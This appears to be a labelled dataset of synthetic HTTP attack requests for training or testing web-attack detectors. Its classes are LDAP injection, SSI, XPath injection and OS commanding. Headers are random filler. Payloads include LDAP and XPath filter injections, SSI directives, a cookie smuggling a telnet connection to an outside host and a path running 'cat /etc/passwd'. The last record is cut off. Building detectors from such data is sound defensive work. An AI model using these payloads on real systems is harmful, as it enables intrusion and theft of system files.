PUT /i_50DH9EW52@DWZKOH.x/HhL3I@pmorBU4connectC3/e0q7AHfgTYoEwL/6p6G_PPsGh5/na/QYr/l6qTG/rvimtpnftahegcn.bin? HTTP/1.1
Content-Length: 106
Content-Language: r,v2vA,otora
Content-Encoding: gzip
Content-Location: /TxjhxnA/wmwusie/UtR5Wnu/tknee.conf
Content-MD5: b2VMb3JnZW11c3JsaXp0NQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 16 Oct 09 16:07:32 GMT
Last-Modified: Mon, 16 Mar 09 10:48:23 CET
Host: www.eNga03ia.org:6080
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 236.109.120.226
Cookie: bu=eu7s  e 86pmer;Hurssas=e6.zHpqH-LXH
Cookie2: $Version="0"
Date: Sun, 11 Sep 05 01:03:06 UTC
ETag: W/"DddEOWrjiiTyulSVN@"
Expect: 100-continue
From: Isa0nt0@Tiskeey.com
If-Modified-Since: Thu, 28 May 09 02:32:06 UTC
If-Unmodified-Since: Wed, 10 Jan 07 02:06:54 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 00
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Digest username="pitaah"
Authorization: Digest algorithm=MD5
Range: -6153,297-,439-473
Referer: http://uteio.biz/itMnIoic.gz
TE: chunked,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/0.8 (Machintosh; U; Mac OS X 9.4; gr-la; rv:9.3.9) Gecko/90889765
UA-CPU: MIPS
UA-Disp: 2548,1743,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4356x362
Via: 3.0 www.Dos0yk.html:97, 5.6 www.iisbo.shtml:37, FTP/0.0 114.145.255.230:49
Transfer-Encoding: compress
Upgrade: KhGnr/5.3, xofo/5.0, aRe/6.6
Warning: 904 www.kohoocU.html "niuhm" 
X-Forwarded-For: 20.191.23.124
X-Serial-Number: 220877773
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

GePILwgetV3=699238&Q7wherepasswdYqph8P8W=4260442917&n9=iNfK&Hfc_Zh=thd)(&(objectClass=  eihe*)

End - Id: 37622
Start - Id: 37231
class: LdapInjection
GET /edeveueslssaesraaeer/bfx2/irsatscbDuey/sQhvtrelou9/9hwFnDIlgo777yLHFQ3B/x.unionj1d@@Acxetobjects/e0OxMXP.EJR.QGpal.aspx?lso=fFPL4GDw%40&e93en1eys=Uyhxhgesnp5e&noindnew=nMQdx&q8=nta0dzgfsveeh5d&rkyaxn=ghrueemohoga9hslu&eiemrhAetDfaoe=Nydi%29%28+++%7C++++%28asT%3D*%29 HTTP/1.0
Host: www.Hq7e0oec.net
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: min-fresh=8
Client-ip: 164.10.58.80
Cookie: huo4rI=secmde0seeh2y
Cookie2: $Version="21"
Date: Tue, 29 Nov 05 11:17:43 UTC
ETag: "V@YyE-8HoVuBPNB"
Expect: xg5edee=apam;5hda
From: 87ho@Inuowxs.net
If-Modified-Since: Sat, 11 Oct 08 08:53:22 CET
If-Unmodified-Since: Wed, 03 Nov 04 15:46:55 CET
If-Match: "jME4sAYPLwR-LZZ6"
If-None-Match: "SspthaH7ycw6c7JEyOT"
If-Range: Fri, 08 Jun 07 11:29:35 UTC
Max-Forwards: 58
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: vghc tzcn=txlrsuw
Range: -035
Referer: /fAheaye/msjoo70q/fpare/edRhpt/nltuof.tiff
TE: trailers
Trailer: Max-Forwards
User-Agent: ltra (q-4q5BBUz; dg_Gg2C; rHGqFEOe.W; qrer5kg; iidIJDP)
UA-CPU: x86
UA-Disp: 5765,446,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0874x8291
Via: 1.9 79.7.160.148:0
Transfer-Encoding: deflate
Upgrade: aybij/7.6, 6sthiq/6.8, nNx/6.1, wAen/2.4, 0taES/8.7
Warning: 444 71.101.94.149:869 "e5eslcsyoIxfqbnaAe" 
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 9354462419781975
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37231
Start - Id: 40903
class: SSI
GET /7MFor/oSz/s_/seesimlENieh/hlrs0/fl45odISnagdrT/etseeSept6metaeii/u5v/ipaK9nt.php?frrohdEereeah=ru-NM7T&nesalifrswooea=dHandnhaccess_log&aarocytyui=164834&gLadminLAG=3936770453&L2aetfdp6rge=65544794&snTiAsBpeen=%3C%21--%23odbc+statement+%3D++++%22select+++lsle%2C+++e3fOOu%2C+++aKefIqr++from+++4kn3h++++order++by++6%2C++++090%2C+++++6%22++++--%3E&wivyelsnt=1&qBevMSXBCUy=%5Cs HTTP/1.1
Host: www.idR1aesasy.de:55
Connection: close
Accept: application/*, image/*;q=0.3
Accept-Charset: x-mac-chinesesimp, iso-8859-8;q=0.8, x-mac-turkish
Accept-Encoding: 
Accept-Language: *;q=0.2
Date: Sat, 17 Oct 09 01:33:11 UTC
If-Unmodified-Since: Sun, 19 Oct 08 24:36:35 UTC
If-None-Match: *
Max-Forwards: 8
Referer: /tesiemh/zhzj/tteEo3jd/dzdo2/Skml0ur.tiff
User-Agent: 4rnt7ubaoa/0.3.5
UA-OS: FreeBSD
Via: 3.4 www.esnuDJ.tiff, HTTP/2.5 www.3lgmE1e.js, 3.0 www.eimtdi.tiff:69
X-Serial-Number: 163741114628927

null

End - Id: 40903
Start - Id: 48518
class: XPathInjection
PUT /FneQLRLlBrPsW/4xWD@/processing-instructionFlVn5yc9oTNkG/toC/eor9cA-i-WzeTZtK8d/eiRtccglctNqo/0dupD/ntYnubnu/enuhte/l3qt.jpeg? HTTP/1.0
Content-Length: 194
Content-Language: aep9ho,cAo11g,sEak0ip
Content-Encoding: deflate
Content-Location: http://n1noc.it/p1dcdn/edmat/nrEu.html
Content-MD5: dGF0bXJlbnJvdGxyTnBscg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 03 May 10 21:08:21 UTC
Last-Modified: Sat, 23 Feb 08 21:08:53 GMT
Host: www.rnsniolaea.ch
Connection: close
Accept: */*;q=0.0
Accept-Charset: iso-8859-2;q=0.5, windows-1255;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 221.85.134.126
Cookie: lwer7kot=triperlefoeecy2rmzlrn
Cookie2: $Version="090"
Date: Sat, 01 Dec 07 09:50:23 UTC
ETag: "QGySzSQMbkDL5SpLi"
Expect: pdaiytge=ttintxkT;rkEAm
From: ndy1yIc@htecd7n.uk
If-Modified-Since: Sat, 12 Jul 08 15:43:42 CET
If-Unmodified-Since: Fri, 16 Apr 10 09:05:13 UTC
If-Match: *
If-None-Match: "CRF7bM-U7NLhH0jfaJvj"
If-Range: Mon, 04 Sep 06 11:26:15 CET
Max-Forwards: 78
MIME-Version: 6.8
Pragma: eOd='Sg'
Proxy-Authorization: Basic ZXNycGVkOmNxbU8=
Authorization: dLedL1 9at7e=pu3pp5
Range: 811682-312,0-
Referer: http://www.trto.be/ltioee/lxxais/ewr9omE/etnii.php4
TE: deflate;q=0.6,trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/1.0 (X11; U; Linux i586 3.0; sU-to; rv:9.2.0) Gecko/18790111
UA-CPU: Sparc
UA-OS: Solaris
UA-Pixels: 6365x946
Via: 4.6 56.220.135.14
Transfer-Encoding: deflate
Warning: 283 189.124.207.85 "vebezowbrhykjtd" "Fri, 02 Apr 10 02:42:52 CET"
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 7572286452988
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

aenni=fo1nwezheb&reensuih=729594&seaUcnyr=tsQ'    or tu/mjiao/child::node()[processing-instruction()=64] or  'lae'=    '&eng=aDn&sdl2ml=s8adlt87Eyfnull4=|auod

End - Id: 48518
Start - Id: 38195
class: LdapInjection
GET /h7Y/elw6mumi1o/t-IMgP5.h1/dAmol4/teiU2u/tZqxirysS/PC.pl?mfKreplace1=idde%26%27+edHu8aaO7&heT=%7CahmOdqstt&xmlQir.WmetarsP=tn&NUboot.iniQYW=tftmporp1stodhci&lTheeheo=emyaservices%3Dstylepnt9&fmoTaay=0a%29%28%26%28objectClass++%3D1a*%29 HTTP/1.1
Host: 106.183.104.199
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: x-mac-arabic, euc-tw;q=0.8, windows-874
Accept-Encoding: *;q=0.8
Accept-Language: ynSxoihE-ooha8, e5jc2dtt-mpwun, h-egK
Cache-Control: no-cache
Client-ip: 9.211.101.123
Cookie: kNprocessing-instructiontmpwtDbP=Ui n4
Cookie2: $Version="97"
Date: Tue, 20 Oct 09 14:30:23 CET
ETag: W/"h8N@m2DAd.B8ytb2d"
Expect: anoae=Rywdsuv
From: hnrpa@Dtsdlni.be
If-Modified-Since: Tue, 25 Jan 05 14:43:53 CET
If-Unmodified-Since: Fri, 05 Sep 08 12:11:23 GMT
If-Match: *
If-None-Match: "1h39WETND68lAI6D"
If-Range: Mon, 15 Nov 04 24:15:44 UTC
Max-Forwards: 3818
MIME-Version: 9.1
Pragma: at='ca'
Proxy-Authorization: Digest nonce
Authorization: Digest opaque="niewa"
Range: -49,281-
Referer: /Leeep.sh
TE: deflate;q=0.0,trailers,deflate;q=0.4
Trailer: If-None-Match
User-Agent: Mozilla/0.3 (compatible; efmedou; Linux i386; htgu; uwesmivm)
UA-CPU: StrongARM
UA-Disp: 843,585,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8072x4973
Via: 2.7 www.heddo.jpeg, 4.7 200.64.122.175, 0.2 www.dq6im.jpeg
Transfer-Encoding: deflate
Upgrade: aec/9.2, nnrn/6.5, ldi/7.0, 7et/3.4, auo/7.2
Warning: 995 www.tstihc.htm "sL1halusfi" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 092315765
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38195
Start - Id: 43645
class: OsCommanding
PUT /Q1nsqxonApGoteTr.tiff? HTTP/1.1
Content-Length: 122
Content-Language: thcnocsa,air6ebeC,oi8f
Content-Encoding: identity
Content-Location: /oys6ujle/zAlffoue/H3neatdy/epteo/cuip.mp3
Content-MD5: Z29hd2ZhdXNjZWFkN28zbw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 04 Mar 08 02:17:52 CET
Last-Modified: Tue, 13 Nov 07 16:35:32 UTC
Host: www.nNeeeoaBi.biz
Connection: keep-alive
Accept: application/*;q=0.0, text/*, image/png
Accept-Charset: gb2312;q=0.5, cp-932, big5
Accept-Encoding: compress, identity;q=0.0, compress
Accept-Language: vreu-Msyv, ig-etit4r;q=0.5, tIhen-d, od6fiWz-dt5z, thse3tee-faro;q=0.3
Cache-Control: only-if-cached
Client-ip: 43.7.143.107
Cookie: ithhere9esl0e=5isax;ct3sy= LEincludes;ebnnon1eRow1=2971240;m8r=\"    \;     \/usr\/bin\/telnet  www.toinllonarro.com 25820\;
Cookie2: $Version="737"
Date: Mon, 16 Oct 06 01:31:53 GMT
ETag: "DFz6-wVe0KJh44gKH5u"
Expect: 100-continue
From: stteA4ju@2lnVxdh.ch
If-Modified-Since: Sat, 12 Feb 05 21:18:26 CET
If-Unmodified-Since: Mon, 22 Feb 10 17:51:12 GMT
If-Match: "1XZ1OOC7wNACCvJT"
If-None-Match: "Oi2dEn0ki-lAwVcx"
If-Range: Mon, 22 Mar 04 18:12:38 UTC
Max-Forwards: 63
Pragma: ahuDq='njwmuass'
Authorization: aeysa 8lYdEDAs=tE2ee
Range: 3033-,1431-72,33-
Referer: /vuse/ehreE/hiddof/aoieouji/cwlr6.asp
TE: trailers,gzip,chunked
User-Agent: 7.0N8Xh http://www.Xeegl.cz
UA-CPU: Sparc
UA-OS: Solaris
UA-Color: color8
Via: HTTP/4.1 33.33.241.115, 4reics/4.7 169.128.135.241
Transfer-Encoding: defi; 6Oin=das0yh
Upgrade: ruakde/7.8
X-Forwarded-For: 164.96.232.179
----: ----------------------

hieeesztdW=oct4wF_&9e=lwp@a8l.&tsnu=a n&ttd=ec4S6tns?eu ge&atpriymnmltiNg=it>&fwIy=rNopt &nyahn7e= &aheje4laeitsle=8

End - Id: 43645
Start - Id: 48757
class: XPathInjection
GET /wqIQACn.pl?n0weholohri5t=Lldd%27%5D+++++%7C+++P+%7C+++%2F%2Fuser%5B++name%2Ftext%28+++%29+%3D+%27iSA&xEyC86E=490 HTTP/1.0
Host: www.eiAEten.de:8478
Connection: ndLalen5
Accept: */*;q=0.9
Accept-Charset: hz-gb-2312
Accept-Encoding: *
Accept-Language: O2wfalu-e;q=0.4
Cache-Control: nOt=Eh6hebs
Client-ip: 29.90.247.5
Cookie: LaomelsduojRbo=eposition3>uianddhtn a;i4temxtsse=ban;tjsetbeVjeotei=ae;ciRti1e3tnc= foot&os
Cookie2: $Version="80"
Date: Mon, 19 Apr 10 18:43:53 UTC
ETag: W/"UE8zeFk_uitRh5X7DiJ-"
Expect: 100-continue
From: W56oeEtt@besin7bi.ch
If-Modified-Since: Sat, 14 May 05 02:50:32 UTC
If-Unmodified-Since: Wed, 11 Jul 07 07:59:18 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 98
MIME-Version: 2.5
Pragma: eaar=e
Proxy-Authorization: Digest uri=http://is55.st/Tmradind/rpos/lestr.pl
Authorization: Digest cnonce="fEhiol"
Range: -26
Referer: /kloo/peA9bae/nntfq/earcso.php3
TE: gzip,gzip;q=0.7,chunked
Trailer: If-Unmodified-Since
User-Agent: cdyoistr (c1nBNcyIs; w_w6.vKj2B; eFWL1voY; tZSlyMz)
UA-CPU: MIPS
UA-Disp: 132,229,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 0470x877
Via: 1.4 110.143.75.10, 9.9 159.27.5.11
Transfer-Encoding: deflate
Upgrade: asd/1.5, Ttn35k/8.5
Warning: 532 201.121.16.113:0328 "sow6hi3ltE" 
X-Forwarded-For: 55.147.33.124
X-Serial-Number: 265535777881770929
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48757
Start - Id: 49202
class: XPathInjection
GET /aEDM.vdc@GP/GsU/icp2hJe1niDeo/dxVrJpasswdwH@autoexecI/VbiniSaBkI4stdin.php?naaossxoHneeEus=17&wm@ky9RJj=atI+oWtOE&ytmpJSER=3592643&documentleURp=i1&r7httpm6cmdSCLrHo=97331&seyaieo1u=7ySE&nrppmectt6aromR=t%40m9C&inmtWua=61++++or+++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or+41232%3D&vLacceptF=99&Rknpd5g9efnth=ceamsatsyetndt HTTP/1.1
Host: www.qicndr.uk
Connection: iaxOzvec
Accept: */*;q=0.1
Accept-Charset: iso-8859-9;q=0.4, windows-874
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=95174
Client-ip: 0.187.188.191
Cookie: dtwlri=8 tt98)|anl;ndt4p=?link\likeem'pr%Eu9Rr8-Yea;tn3=yHJCzARfzq;hsvn=tSapobceznnkues;rrauOah4arqui=iJ@inarpassthruRtn7idekuinput$;SDHWpJ=aH2t7
Cookie2: $Version="2"
Date: Sun, 23 Dec 07 21:30:37 GMT
ETag: "@51LvTgOClY2k5dD"
Expect: kwohSom
From: Gswzt6t2@seem.gov
If-Modified-Since: Tue, 13 Oct 09 23:18:33 GMT
If-Unmodified-Since: Mon, 02 Jun 08 23:20:41 CET
If-Match: "clsHUmYoo1UHSgsn6@"
If-None-Match: *
If-Range: *
Max-Forwards: 63
MIME-Version: 6.8
Pragma: 5esc4=Mt
Proxy-Authorization: Basic MWd0YTpydGplZWl3
Authorization: NTLM cnRhNGVTMGlocHRob2JlaXpxY3RNM3RoMUlpczVpaXJlQXQ=
Range: -392691
Referer: http://www.amler.com/noiere/Nlsdilep.mdb
TE: deflate;q=0.6,trailers
Trailer: Authorization
User-Agent: 0eesnhrap2alt
UA-CPU: MIPS
UA-Disp: 2354,727,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 6245x946
Via: 9.6 www.hama5ons.html
Transfer-Encoding: compress
Upgrade: wtrfa/2.8, tto/9.5, nvs/5.2
Warning: 730 219.205.127.123 "usTsd6rt4" "Mon, 01 Nov 04 10:01:00 CET"
X-Forwarded-For: 243.220.220.113
X-Serial-Number: 094897870
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49202
Start - Id: 38251
class: LdapInjection
GET /1Z8._netNMgAon.RmX.shtml?9ahsRfotolltd=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&Qvsnhooaqbs=qh&tzosis=a&atEAhohuia=15967&iw2@znbbgsoundPI5=z7E8MaFDz5&uStlooen=pnkneafettpth&ster=%7C&krmWuQr73=eera%3Fh%7E6dteEi HTTP/1.0
Host: 97.198.183.239
Connection: saccEkt
Accept: application/postscript, video/*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 168.71.61.81
Cookie: twabSkpstetnrc=e&ou
Cookie2: $Version="7"
Date: Tue, 29 May 07 18:35:22 UTC
ETag: "HmmK-Pe-jjfxx-a"
Expect: 100-continue
From: Eorust@uthn0.it
If-Modified-Since: Thu, 30 Sep 04 23:14:00 UTC
If-Unmodified-Since: Sun, 17 Jul 05 18:32:23 UTC
If-Match: "W7r3reOYUEPzLzC"
If-None-Match: *
If-Range: "HRw35xyYBy-Q3vQ12X"
Max-Forwards: 5
MIME-Version: 9.0
Pragma: trApct=tcw
Proxy-Authorization: hgak4o jyhewio=ntfs
Authorization: NTLM cmFubm5kUHViczJsYU9ORUxjYXR4YWduaWFPTHpwdDJuaG5hZHlydGtzc2llOXNS
Range: -465,47-4
Referer: /n1ie/rylasin/os9we/oRtsot6l.rar
TE: chunked,trailers,gzip;q=0.6
Trailer: Proxy-Authorization
User-Agent: aoeemerFreEr
UA-CPU: PowerPC
UA-Disp: 8634,303,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 980x990
Via: 9.2 www.lo6asdq.png
Transfer-Encoding: deflate
Upgrade: eddcT/3.3, roas/0.6
Warning: 420 www.hNfxAea.shtml "ha5earnepwc" "Thu, 20 Jan 05 10:55:49 UTC"
X-Forwarded-For: 188.85.68.116
X-Serial-Number: 05796287611
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38251
Start - Id: 40862
class: SSI
GET /tjhtayenaataneogetv/3xkNmmJ7LrM/hewoi66Deehe2e/WJogks/OnstryzDoriss4ePoRb/deletefx-xe1/ic/amlTEsFo/ylBOELWm.tiff?dnidttnoExoh6=aev7goeT&es9oOywio0ssmna=631870725&ntr4nruitaf=11e&Pvhs=8nectwtykn&tysdnh=1168&aufitqjeMhesbta=exH0DwEY&JfkmPJ0sq_=eA&rlottseyou9q=%3C%21--+%23odbc++++statement+%3D++++%22select+++++es%2C+MowU%2C+aEtk++++from+++++trihmfdqno+order+++++by+2%2C+++882%2C+++++9%22++--%3E&lPirnsFoioen=l7Tef&hs=moehlhl5gEefbfxee HTTP/1.1
Host: www.eh5t.it
Connection: close
Accept: */*
Accept-Charset: iso-8859-1;q=0.7
Accept-Encoding: gzip
Accept-Language: ab-khzal;q=0.2, Rta-t;q=0.5, io-l2eamnio;q=0.3, w-eoa;q=0.1
Cache-Control: no-store
Client-ip: 183.188.60.40
Cookie: 7rshoit5muZn07=0064384;Na=tm3rM2;niu=a inputjoifi5wB
Cookie2: $Version="380"
Date: Thu, 30 Jul 09 22:08:39 UTC
ETag: "l8YqCEbciYrBlazH.KJE"
Expect: ahutgh=Zrti
From: eehiebno@oeiwxnsrq.st
If-Modified-Since: Fri, 13 May 05 10:08:37 GMT
If-Unmodified-Since: Tue, 08 Jun 04 07:31:29 UTC
If-Match: "J9xuKGeW0UoA1a74"
If-None-Match: *
If-Range: "LVPH1NkG@4g7F9t5qiG-"
Max-Forwards: 93
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Basic Y29vbGVudG86aHdzb2F6Yw==
Authorization: Basic ZmVsb2Vtcjpuc3NlZWVhbA==
Range: 982-719379,-7604
Referer: http://www.6to2.biz/wuphfqoa/4ssthsi4.asmx
TE: gzip;q=0.5,trailers
Trailer: Upgrade
User-Agent: Sldsittutoeiebfzt
UA-CPU: x86
UA-Disp: 2426,7787,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5993x410
Via: HTTP/5.6 www.s8pthwr.jpeg, w9r/9.3 www.orrse.css, titt/8.7 www.GuyluO.png
Transfer-Encoding: compress
Upgrade: saht/3.7, 9sha/5.8, Eossd/8.6, rms/3.5
Warning: 001 94.18.227.26 "tarnYgrgo4d" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 49586702317462
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40862
Start - Id: 38371
class: LdapInjection
GET /adg9qfoUlee7o/sulifltNd9iew1oaoat/esreimt0D/qs_blPDapX/qoitg8hpcNeacrisc.php?csrTt0eoases5oe=yAJZO&rnapitf=tkhAi7&inv5deysasenkf=nn6onat6eu7&cit7=hhr+n&tml3e=aysen9elStyfo4y7&ul1lNu_location=%2Bh%27to&aRte3ttMmj=fa2%29%28%26%28objectClass%3D+++ooml*%29&eftsirjnecesm5=onreazd0a HTTP/1.1
Host: 214.70.67.170
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 152.74.253.224
Cookie: tdy4jsahtoaA5lp=14;VBXwQRUgK=5aL4MLnlx3x-;cnojah=?uaa0zrs \hnexo
Cookie2: $Version="9"
Date: Tue, 16 Nov 04 02:38:54 CET
ETag: "_tbcCy0@wz8M8jd"
Expect: 100-continue
From: frlm@ctsi1ez.ch
If-Modified-Since: Thu, 15 Mar 07 17:03:26 CET
If-Unmodified-Since: Sat, 25 Apr 09 10:38:37 GMT
If-Match: "x3Veeu-2SRCXR1YS"
If-None-Match: *
If-Range: *
Max-Forwards: 650
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic dGlkaVI6ZDllUnJhcg==
Authorization: Basic cHhjdHRhbjpic2NldA==
Range: -0,582766-
Referer: http://www.awoee.st/h6hpgb/eecna/eee2rtis/d9nrc1/ia8g.mp3
TE: deflate;q=0.4,chunked;q=0.1,deflate
Trailer: Referer
User-Agent: Mozilla/4.6 (Machintosh; U; Mac OS X 8.5; ge-ny; rv:1.1.9) Gecko/32929197
UA-CPU: 68000
UA-Disp: 1837,228,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 6897x261
Via: 6.1 www.tsBshuqe.htm:7946
Transfer-Encoding: deflate
Upgrade: o1jc/2.3, igt/0.7, Hce/5.3, re9/4.3
Warning: 144 www.enoipEi.htm "wtoi" 
X-Forwarded-For: 0.127.43.146
X-Serial-Number: 9579642646846
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38371
Start - Id: 39493
class: SSI
POST /866yhtdaeti/oaolHwK5c7qUykDrznAw/aioDafedenltne6ya/M8BClibYp/t2Hr/ya4pbnodsanjwjrttjoa/w2abraOinputWEF.cfm? HTTP/1.1
Content-Length: 48
Content-Language: aapim3ee,amfts0,ea
Content-Encoding: compress
Content-Location: /flbbu4/Tiu9e/7yai/E8rgn.exe
Content-MD5: ZW5uZW9lb29lM25oZnhtRA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 31 Dec 09 02:09:31 CET
Last-Modified: Thu, 23 Oct 08 15:00:02 GMT
Host: www.insdbBts.org:9864
Connection: s4aet4ef
Accept: image/*;q=0.9, audio/x-wav, image/jpeg
Accept-Charset: windows-1250, windows-1254, x-mac-roman, x-mac-icelandic;q=0.7
Accept-Encoding: gzip;q=0.9, gzip
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 156.55.147.82
Cookie: iia4oup=<!--#echo var="date_gmt"-->
Cookie2: $Version="20"
Date: Tue, 06 Jan 09 07:23:16 CET
Expect: zmhaZbmt
If-Modified-Since: Fri, 09 Oct 09 11:45:20 GMT
If-Unmodified-Since: Fri, 13 Mar 09 20:10:25 CET
If-Match: "t_jh53fYSDqnLLsx4"
If-None-Match: *
If-Range: Fri, 19 Mar 10 22:55:09 CET
Max-Forwards: 64
Pragma: no-cache
Referer: /laed/gp8ot/3naeiwp/nuLjd.jsp
TE: trailers,chunked;q=0.3,deflate
User-Agent: oT5ewoILP2 http://www.nnnlI.biz
UA-Pixels: 4899x9428
Via: ET1ow/1.3 www.qqotTfm.gif, 1.9 50.28.85.155
Upgrade: tjea/8.6, 9nXle/5.8, nrmoi/4.4
X-Forwarded-For: 114.204.134.63
----: -----------------------------

orTxtAjfhaetO=  |einpiccmd&PAwi_SVgroup byL=At

End - Id: 39493
Start - Id: 38888
class: LdapInjection
GET /p8nldphrtlNas6/f8d/cidihtOsscEldsr/mH_-Q9j/h61stv/o9-hI2Plx/1AImCg6iVOLE_/nntrcbAeenShbol.swf?NaTlvni6dS7yal=eiutboot.inin%25lcopy&O4hEg=ph5tte&ri=t%2FsininmbWam4e&tecd=sI%3B%25u&lpeonmrfNgnsen=owsioheMmi9naSf&hdeJlnoLHisyaf=tseh&f0snalaq=tnhsle2pcwsaUe&hio1anaanOraao=+bin69hadminthtechoUa&db9as=bmmireMimghu&tiisenZPrkdel=tr4b6lmeYEoeudehM&oehMc=eQnJTm&i8BUzFq=37&taOeezTap=2885957&oeqCye6korurei=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: 88.172.139.96
Connection: speb4
Accept: audio/x-wav, video/quicktime;q=0.4, image/*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 191.208.34.138
Cookie: ofsocnimoNt=C9s6i6script F6oxtoe
Cookie2: $Version="1"
Date: Mon, 26 Dec 05 13:01:44 CET
ETag: W/"GQYvF59TeQfbrP-gc"
Expect: c7ir=tn3En;Empshri=enms
From: w08rh3@rpehekeyi.com
If-Modified-Since: Sun, 27 Dec 09 04:49:54 UTC
If-Unmodified-Since: Sat, 30 Oct 04 20:09:49 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 31 Dec 09 24:35:10 UTC
Max-Forwards: 5
MIME-Version: 2.4
Pragma: avqey=srneu
Proxy-Authorization: NTLM MnQzaW9iYWF0aHNsUnRjYzBudGlpa0FvVWVjZWE3ZWlwNGVsaHNpYWZpc3BoZWE=
Authorization: rnor emhn=spata
Range: 15934-,799-8058,-81465
Referer: http://eimsbcc.net/EEnk8eoy/eeossq3u/estt.nsf
TE: deflate
Trailer: Transfer-Encoding
User-Agent: aerrn (iEgRQ1)
UA-CPU: x86
UA-Disp: 117,0811,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 297x7324
Via: 5.4 www.afeah.tiff:05, FTP/8.6 www.enHl6cv.gif:90782
Transfer-Encoding: etors; akatC=LOyruhn6
Upgrade: aHt/9.9, puadon/4.1, Ahs/8.1
Warning: 654 173.160.4.85 "Ioao" 
X-Forwarded-For: 179.200.182.228
X-Serial-Number: 9521103915785136495
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38888
Start - Id: 44539
class: OsCommanding
GET /handler;cat /etc/passwd| ? HTTP/1.0
Host: 61.130.19.25:80
Connection: keep-alive
Accept: */*
Accept-Charset: iso-10646-ucs-2, windows-1253, x-mac-hebrew, iso-8859-9;q=0.0, cp-950
Accept-Encoding: identity;q=0.1, identity;q=0.5
Accept-Language: *
Cache-Control: max-stale
Client-ip: 15.83.253.70
Cookie: a2wbk4cn=ii2nle5yoevlb;-8wfE9Dk=nst
Date: Mon, 02 Mar 09 15:45:51 GMT
ETag: W/"QvUfPoXfec5ko_Eqm"
If-Modified-Since: Sat, 07 Jan 06 17:24:40 UTC
If-None-Match: *
If-Range: "_ed4eX@qdLdBt8K"
Max-Forwards: 9
Pragma: ska='uiOo13Ni'
Proxy-Authorization: Basic YXJucGF4bnM6Rm90aGl6
Authorization: Basic ckxodDpzbUVu
Range: 07390-,-851404
Referer: /9zEnWoi/Onids0s/xohYlrbI/enine.jpg
TE: deflate;q=0.2
Trailer: Accept-Language
User-Agent: v6cruiryronbtlJsNI
UA-Pixels: 069x3705
Via: FTP/6.7 248.191.227.202, euulu/3.2 www.daoi.shtml
Transfer-Encoding: deflate
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 44539
Start - Id: 37781
class: LdapInjection
GET /DD90JtaF/fWd_telnetW/fqXYH@J4qNCtozCg/d0pscurwrqep/4l/uWDagyMSyOxly/cx5snmpmsO2doSip0/h1c/o5kMvo9having2openX-Mls0/lmmOeUOH3krywilYQgC.asp?Nocy=giNL&aee=%29ehi%29+s+&PYuK.=6npt%29%28++%7C+++%28WPhi%3D*%29 HTTP/1.1
Host: www.rogfresve.be:6271
Connection: keep-alive
Accept: text/html, image/*;q=0.4
Accept-Charset: *
